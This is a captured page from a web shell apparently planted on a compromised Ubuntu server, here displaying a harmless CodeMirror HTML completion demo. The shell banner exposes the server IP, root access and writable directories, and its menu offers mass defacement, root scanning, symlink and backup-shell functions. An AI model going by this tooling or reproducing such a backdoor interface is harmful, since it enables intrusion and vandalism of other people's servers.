AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/libjs-codemirror/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /usr/share/doc/libjs-codemirror/examples/html5complete.html
<!doctype html>

<head>
  <title>CodeMirror: HTML completion demo</title>
  <meta charset="utf-8"/>
  <link rel=stylesheet href="../html/docs.css">

  <link rel="stylesheet" href="/usr/share/javascript/codemirror/lib/codemirror.css">
  <link rel="stylesheet" href="/usr/share/javascript/codemirror/addon/hint/show-hint.css">
  <script src="/usr/share/javascript/codemirror/lib/codemirror.js"></script>
  <script src="/usr/share/javascript/codemirror/addon/hint/show-hint.js"></script>
  <script src="/usr/share/javascript/codemirror/addon/hint/xml-hint.js"></script>
  <script src="/usr/share/javascript/codemirror/addon/hint/html-hint.js"></script>
  <script src="/usr/share/javascript/codemirror/mode/xml/xml.js"></script>
  <script src="/usr/share/javascript/codemirror/mode/javascript/javascript.js"></script>
  <script src="/usr/share/javascript/codemirror/mode/css/css.js"></script>
  <script src="/usr/share/javascript/codemirror/mode/htmlmixed/htmlmixed.js"></script>
  <style>
    .CodeMirror {border-top: 1px solid #888; border-bottom: 1px solid #888;}
  </style>
</head>

<body>
  <div id=nav>
    <a href="https://codemirror.net"><h1>CodeMirror</h1><img id=logo src="../html/logo.png"></a>

    <ul>
      <li><a href="../index.html">Home</a>
      <li><a href="../html/manual.html">Manual</a>
      <li><a href="https://github.com/codemirror/codemirror">Code</a>
    </ul>
    <ul>
      <li><a class=active href="#">HTML completion</a>
    </ul>
  </div>

  <article>
    <h2>HTML completion demo</h2>

    <p>Shows the <a href="xmlcomplete.html">XML completer</a>
    parameterized with information about the tags in HTML.
    Press <strong>ctrl-space</strong> to activate completion.</p>

    <div id="code"></div>

    <script>
      window.onload = function() {
        editor = CodeMirror(document.getElementById("code"), {
          mode: "text/html",
          extraKeys: {"Ctrl-Space": "autocomplete"},
          value: document.documentElement.innerHTML
        });
      };
    </script>
  </article>
</body>

Anon7 - 2022
AnonSec Team